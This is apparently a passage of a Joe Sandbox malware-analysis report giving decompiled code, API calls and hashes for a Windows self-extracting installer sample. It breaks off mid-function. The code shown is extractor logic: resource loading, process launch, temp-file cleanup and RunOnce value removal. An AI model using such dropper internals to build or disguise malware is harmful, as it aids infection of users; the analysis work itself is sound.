                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004040ae
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004040ae

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 0040401F
                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404035
                                                                                                                                                                                                                                      • GetExitCodeProcess.KERNELBASE(?,?), ref: 00404048
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00404088
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00404094
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 004040C8
                                                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 004040D5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3183975587-0
                                                                                                                                                                                                                                      • Opcode ID: 6539d6f0e4c1033012e003164b95aa56a3fbbe09438f9c6505d5a0634de8dbac
                                                                                                                                                                                                                                      • Instruction ID: 9524cc610cdaf46c4a61aace48a9c430cbd86000308ba760dfe9b8b3adc3bdc4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6539d6f0e4c1033012e003164b95aa56a3fbbe09438f9c6505d5a0634de8dbac
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4031AEB1640218ABEB209F65DD49FAB777CEBD4704F2040BAF745F21A0CA344D458F2A
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                      			E004051A5(void* __eflags) {
                                                                                                                                                                                                                                      				int _t5;
                                                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                                                      				void* _t28;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t1 = E00404669("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                      				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                      				if(_t28 != 0) {
                                                                                                                                                                                                                                      					if(E00404669("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                                                      						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                                                      						if(_t5 != 0) {
                                                                                                                                                                                                                                      							_t6 = E00404495(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                                                      							LocalFree(_t28);
                                                                                                                                                                                                                                      							if(_t6 != 6) {
                                                                                                                                                                                                                                      								 *0x409124 = 0x800704c7;
                                                                                                                                                                                                                                      								L10:
                                                                                                                                                                                                                                      								return 0;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							 *0x409124 = 0;
                                                                                                                                                                                                                                      							L6:
                                                                                                                                                                                                                                      							return 1;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						LocalFree(_t28);
                                                                                                                                                                                                                                      						goto L6;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					E00404495(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                      					LocalFree(_t28);
                                                                                                                                                                                                                                      					 *0x409124 = 0x80070714;
                                                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				E00404495(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                      				 *0x409124 = E00406233();
                                                                                                                                                                                                                                      				goto L10;
                                                                                                                                                                                                                                      			}






                                                                                                                                                                                                                                      0x004051bb
                                                                                                                                                                                                                                      0x004051c7
                                                                                                                                                                                                                                      0x004051cb
                                                                                                                                                                                                                                      0x004051fc
                                                                                                                                                                                                                                      0x00405228
                                                                                                                                                                                                                                      0x00405230
                                                                                                                                                                                                                                      0x0040524b
                                                                                                                                                                                                                                      0x00405253
                                                                                                                                                                                                                                      0x0040525c
                                                                                                                                                                                                                                      0x00405266
                                                                                                                                                                                                                                      0x00405270
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405270
                                                                                                                                                                                                                                      0x0040525e
                                                                                                                                                                                                                                      0x00405239
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040523b
                                                                                                                                                                                                                                      0x00405233
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405233
                                                                                                                                                                                                                                      0x0040520a
                                                                                                                                                                                                                                      0x00405210
                                                                                                                                                                                                                                      0x00405216
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405216
                                                                                                                                                                                                                                      0x004051d9
                                                                                                                                                                                                                                      0x004051e3
                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00404669: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 0040467A
                                                                                                                                                                                                                                        • Part of subcall function 00404669: SizeofResource.KERNEL32(00000000,00000000,?,00402D11,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00404683
                                                                                                                                                                                                                                        • Part of subcall function 00404669: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 0040469D
                                                                                                                                                                                                                                        • Part of subcall function 00404669: LoadResource.KERNEL32(00000000,00000000,?,00402D11,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A6
                                                                                                                                                                                                                                        • Part of subcall function 00404669: LockResource.KERNEL32(00000000,?,00402D11,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046AD
                                                                                                                                                                                                                                        • Part of subcall function 00404669: memcpy_s.MSVCRT ref: 004046BF
                                                                                                                                                                                                                                        • Part of subcall function 00404669: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046C9
                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00402F40,?,00000002,00000000), ref: 004051C1
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00405210
                                                                                                                                                                                                                                        • Part of subcall function 00404495: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 004044F4
                                                                                                                                                                                                                                        • Part of subcall function 00404495: MessageBoxA.USER32(?,?,OxZQ,00010010), ref: 00404530
                                                                                                                                                                                                                                        • Part of subcall function 00406233: GetLastError.KERNEL32(00405B72), ref: 00406233
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                      • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                      • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                      • Opcode ID: 3855c03d61cf48f411038678d83bc1bcc77c367c956292a9a7232ee9c3df2436
                                                                                                                                                                                                                                      • Instruction ID: baa8589e3737503f4956c566a83c1c791caecac57719c302ce324ae8f9a6aec8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3855c03d61cf48f411038678d83bc1bcc77c367c956292a9a7232ee9c3df2436
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2811D0B1700205BBE324ABB25E49F2B619DDFC9744F10443FB602FA2D0EABD8C01592D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 74%
                                                                                                                                                                                                                                      			E00405276(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                                                      				signed int _t11;
                                                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                                                      				void* _t29;
                                                                                                                                                                                                                                      				CHAR** _t31;
                                                                                                                                                                                                                                      				void* _t32;
                                                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t28 = __edi;
                                                                                                                                                                                                                                      				_t22 = __ecx;
                                                                                                                                                                                                                                      				_t21 = __ebx;
                                                                                                                                                                                                                                      				_t9 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                                                      				_push(__esi);
                                                                                                                                                                                                                                      				_t31 =  *0x4091e0; // 0x2668628
                                                                                                                                                                                                                                      				if(_t31 != 0) {
                                                                                                                                                                                                                                      					_push(__edi);
                                                                                                                                                                                                                                      					do {
                                                                                                                                                                                                                                      						_t29 = _t31;
                                                                                                                                                                                                                                      						if( *0x408a24 == 0 &&  *0x409a30 == 0) {
                                                                                                                                                                                                                                      							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                                                      							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t31 = _t31[1];
                                                                                                                                                                                                                                      						LocalFree( *_t29);
                                                                                                                                                                                                                                      						LocalFree(_t29);
                                                                                                                                                                                                                                      					} while (_t31 != 0);
                                                                                                                                                                                                                                      					_pop(_t28);
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t11 =  *0x408a20; // 0x0
                                                                                                                                                                                                                                      				_pop(_t32);
                                                                                                                                                                                                                                      				if(_t11 != 0 &&  *0x408a24 == 0 &&  *0x409a30 == 0) {
                                                                                                                                                                                                                                      					_push(_t22);
                                                                                                                                                                                                                                      					E004017A1( &_v268, 0x104, _t22, "C:\Users\Arthur\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                      					if(( *0x409a34 & 0x00000020) != 0) {
                                                                                                                                                                                                                                      						E00406592( &_v268);
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                                                      					_t22 =  &_v268;
                                                                                                                                                                                                                                      					E00402395( &_v268);
                                                                                                                                                                                                                                      					_t11 =  *0x408a20; // 0x0
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				if( *0x409a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                                                      					_t11 = E00401FEC(_t22); // executed
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				 *0x408a20 =  *0x408a20 & 0x00000000;
                                                                                                                                                                                                                                      				return E00406C80(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                                                      			}












                                                                                                                                                                                                                                      0x00405276
                                                                                                                                                                                                                                      0x00405276
                                                                                                                                                                                                                                      0x00405276
                                                                                                                                                                                                                                      0x00405281
                                                                                                                                                                                                                                      0x00405288
                                                                                                                                                                                                                                      0x0040528b
                                                                                                                                                                                                                                      0x0040528c
                                                                                                                                                                                                                                      0x00405294
                                                                                                                                                                                                                                      0x00405296
                                                                                                                                                                                                                                      0x00405297
                                                                                                                                                                                                                                      0x0040529e
                                                                                                                                                                                                                                      0x004052a0
                                                                                                                                                                                                                                      0x004052b2
                                                                                                                                                                                                                                      0x004052ba
                                                                                                                                                                                                                                      0x004052ba
                                                                                                                                                                                                                                      0x004052c2
                                                                                                                                                                                                                                      0x004052c5
                                                                                                                                                                                                                                      0x004052cc
                                                                                                                                                                                                                                      0x004052d2
                                                                                                                                                                                                                                      0x004052d6
                                                                                                                                                                                                                                      0x004052d6
                                                                                                                                                                                                                                      0x004052d7
                                                                                                                                                                                                                                      0x004052dc
                                                                                                                                                                                                                                      0x004052df
                                                                                                                                                                                                                                      0x004052f3
                                                                                                                                                                                                                                      0x00405305
                                                                                                                                                                                                                                      0x00405311
                                                                                                                                                                                                                                      0x00405319
                                                                                                                                                                                                                                      0x00405319
                                                                                                                                                                                                                                      0x00405323
                                                                                                                                                                                                                                      0x00405329
                                                                                                                                                                                                                                      0x0040532f
                                                                                                                                                                                                                                      0x00405334
                                                                                                                                                                                                                                      0x00405334
                                                                                                                                                                                                                                      0x00405341
                                                                                                                                                                                                                                      0x00405347
                                                                                                                                                                                                                                      0x00405347
                                                                                                                                                                                                                                      0x0040534f
                                                                                                                                                                                                                                      0x0040535e

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetFileAttributesA.KERNELBASE(02668628,00000080,?,00000000), ref: 004052B2
                                                                                                                                                                                                                                      • DeleteFileA.KERNELBASE(02668628), ref: 004052BA
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(02668628,?,00000000), ref: 004052C5
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(02668628), ref: 004052CC
                                                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(004011FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00405323
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 004052F4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                      • API String ID: 2833751637-816172423
                                                                                                                                                                                                                                      • Opcode ID: df1af507fb765fc16979049c5e885436858539750d3f9f30199e1a612ced32b8
                                                                                                                                                                                                                                      • Instruction ID: 1f5e3bfe5210f942bfd6a3a5d248ffedeaf4b1aba115bc8ba9b73e7ac5786c51
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: df1af507fb765fc16979049c5e885436858539750d3f9f30199e1a612ced32b8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2216D31611A18DBEB219F24EF09B6A77A4EB14744F40407EE982766E1CFB85D84CF5C
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                      			E00401FEC(void* __ecx) {
                                                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                                                      				long _t4;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				if( *0x408530 != 0) {
                                                                                                                                                                                                                                      					_t1 =  &_v8; // 0x40534c
                                                                                                                                                                                                                                      					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006, _t1); // executed
                                                                                                                                                                                                                                      					if(_t4 == 0) {
                                                                                                                                                                                                                                      						_t2 =  &_v8; // 0x40534c, executed
                                                                                                                                                                                                                                      						RegDeleteValueA( *_t2, "wextract_cleanup0"); // executed
                                                                                                                                                                                                                                      						return RegCloseKey(_v8);
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				return _t4;
                                                                                                                                                                                                                                      			}





                                                                                                                                                                                                                                      0x00401ff9
                                                                                                                                                                                                                                      0x00401ffb
                                                                                                                                                                                                                                      0x00402010
                                                                                                                                                                                                                                      0x00402018
                                                                                                                                                                                                                                      0x0040201f
                                                                                                                                                                                                                                      0x00402022
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040202b
                                                                                                                                                                                                                                      0x00402018
                                                                                                                                                                                                                                      0x00402032

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,LS@,?,?,0040534C), ref: 00402010
                                                                                                                                                                                                                                      • RegDeleteValueA.KERNELBASE(LS@,wextract_cleanup0,?,?,0040534C), ref: 00402022
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,0040534C), ref: 0040202B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                      • String ID: LS@$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                                                                                                                                      • API String ID: 849931509-821135860
                                                                                                                                                                                                                                      • Opcode ID: 1efd55c4250a697650f25b4838c7d2d49f4b8050d28ea15937a3e2cf7e8aae32
                                                                                                                                                                                                                                      • Instruction ID: b5152a994ad13546bb1c3023f6ddd89708a5fb953d0621aeddde8ecdfd2eb408
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1efd55c4250a697650f25b4838c7d2d49f4b8050d28ea15937a3e2cf7e8aae32
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AFE08630510318BBDB208F90EF4EF5E7A6DE700784F200079B605B00E0DBB49A54D70D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 78%
                                                                                                                                                                                                                                      			E004064C3(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                      				struct HRSRC__* _t6;
                                                                                                                                                                                                                                      				int _t10;
                                                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                                                      				struct HINSTANCE__* _t23;
                                                                                                                                                                                                                                      				int _t24;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t23 =  *0x409a3c; // 0x400000
                                                                                                                                                                                                                                      				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                                                      				if(_t6 == 0) {
                                                                                                                                                                                                                                      					L6:
                                                                                                                                                                                                                                      					E00404495(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                      					_t24 = _a16;
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                                                      					if(_t21 == 0) {
                                                                                                                                                                                                                                      						goto L6;
                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                      						if(_a12 != 0) {
                                                                                                                                                                                                                                      							_push(_a12);
                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t10 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8); // executed
                                                                                                                                                                                                                                      						_t24 = _t10;
                                                                                                                                                                                                                                      						FreeResource(_t21);
                                                                                                                                                                                                                                      						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                                                      							goto L6;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				return _t24;
                                                                                                                                                                                                                                      			}








                                                                                                                                                                                                                                      0x004064cb
                                                                                                                                                                                                                                      0x004064d6
                                                                                                                                                                                                                                      0x004064e0
                                                                                                                                                                                                                                      0x00406517
                                                                                                                                                                                                                                      0x00406523
                                                                                                                                                                                                                                      0x00406528
                                                                                                                                                                                                                                      0x004064e2
                                                                                                                                                                                                                                      0x004064ea
                                                                                                                                                                                                                                      0x004064ee
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004064f0
                                                                                                                                                                                                                                      0x004064f3
                                                                                                                                                                                                                                      0x004064f8
                                                                                                                                                                                                                                      0x004064f5
                                                                                                                                                                                                                                      0x004064f5
                                                                                                                                                                                                                                      0x004064f5
                                                                                                                                                                                                                                      0x00406503
                                                                                                                                                                                                                                      0x0040650a
                                                                                                                                                                                                                                      0x0040650c
                                                                                                                                                                                                                                      0x00406515
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00406515
                                                                                                                                                                                                                                      0x004064ee
                                                                                                                                                                                                                                      0x00406531

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindResourceA.KERNEL32(00400000,000007D6,00000005), ref: 004064D6
                                                                                                                                                                                                                                      • LoadResource.KERNEL32(00400000,00000000,?,?,00402EDF,00000000,00401A00,00000547,0000083E,?,?,?,?,?,?,?), ref: 004064E4
                                                                                                                                                                                                                                      • DialogBoxIndirectParamA.USER32(00400000,00000000,00000547,00401A00,00000000), ref: 00406503
                                                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,00402EDF,00000000,00401A00,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 0040650C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1214682469-0
                                                                                                                                                                                                                                      • Opcode ID: f9da8421ca1abb9b46b167c893a4eb8daea00a307a459ded79b2ccb77b9936d3
                                                                                                                                                                                                                                      • Instruction ID: 5121940ae64acd9741f22efd6c394c4d92f0963068d9740e5d7e20c25a85a4bf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f9da8421ca1abb9b46b167c893a4eb8daea00a307a459ded79b2ccb77b9936d3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85014972100206BBCB105F689C08DAB376CEF89364F01403AFE12B61D0DB74CC209BB9
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                                                      			E00404CA0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                      				signed int _t29;
                                                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                                                      				long _t32;
                                                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                                                      				long _t35;
                                                                                                                                                                                                                                      				long _t36;
                                                                                                                                                                                                                                      				struct HWND__* _t37;
                                                                                                                                                                                                                                      				long _t38;
                                                                                                                                                                                                                                      				long _t39;
                                                                                                                                                                                                                                      				long _t41;
                                                                                                                                                                                                                                      				long _t44;
                                                                                                                                                                                                                                      				long _t45;
                                                                                                                                                                                                                                      				long _t46;
                                                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                                                      				long _t51;
                                                                                                                                                                                                                                      				char* _t58;
                                                                                                                                                                                                                                      				long _t59;
                                                                                                                                                                                                                                      				char* _t63;
                                                                                                                                                                                                                                      				long _t64;
                                                                                                                                                                                                                                      				CHAR* _t71;
                                                                                                                                                                                                                                      				CHAR* _t74;
                                                                                                                                                                                                                                      				int _t75;
                                                                                                                                                                                                                                      				signed int _t76;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t69 = __edx;
                                                                                                                                                                                                                                      				_t29 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                                                      				_v8 = _t30;
                                                                                                                                                                                                                                      				_t75 = _a8;
                                                                                                                                                                                                                                      				if( *0x4091d8 == 0) {
                                                                                                                                                                                                                                      					_t32 = _a4;
                                                                                                                                                                                                                                      					__eflags = _t32;
                                                                                                                                                                                                                                      					if(_t32 == 0) {
                                                                                                                                                                                                                                      						_t33 = E00404E67(_t75);
                                                                                                                                                                                                                                      						L35:
                                                                                                                                                                                                                                      						return E00406C80(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					_t35 = _t32 - 1;
                                                                                                                                                                                                                                      					__eflags = _t35;
                                                                                                                                                                                                                                      					if(_t35 == 0) {
                                                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                                                      						_t33 = 0;
                                                                                                                                                                                                                                      						goto L35;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					_t36 = _t35 - 1;
                                                                                                                                                                                                                                      					__eflags = _t36;
                                                                                                                                                                                                                                      					if(_t36 == 0) {
                                                                                                                                                                                                                                      						_t37 =  *0x408584; // 0x203b8
                                                                                                                                                                                                                                      						__eflags = _t37;
                                                                                                                                                                                                                                      						if(_t37 != 0) {
                                                                                                                                                                                                                                      							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4)); // executed
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t54 = 0x4091e4;
                                                                                                                                                                                                                                      						_t58 = 0x4091e4;
                                                                                                                                                                                                                                      						do {
                                                                                                                                                                                                                                      							_t38 =  *_t58;
                                                                                                                                                                                                                                      							_t58 =  &(_t58[1]);
                                                                                                                                                                                                                                      							__eflags = _t38;
                                                                                                                                                                                                                                      						} while (_t38 != 0);
                                                                                                                                                                                                                                      						_t59 = _t58 - 0x4091e5;
                                                                                                                                                                                                                                      						__eflags = _t59;
                                                                                                                                                                                                                                      						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                                                      						_t73 =  &(_t71[1]);
                                                                                                                                                                                                                                      						do {
                                                                                                                                                                                                                                      							_t39 =  *_t71;
                                                                                                                                                                                                                                      							_t71 =  &(_t71[1]);
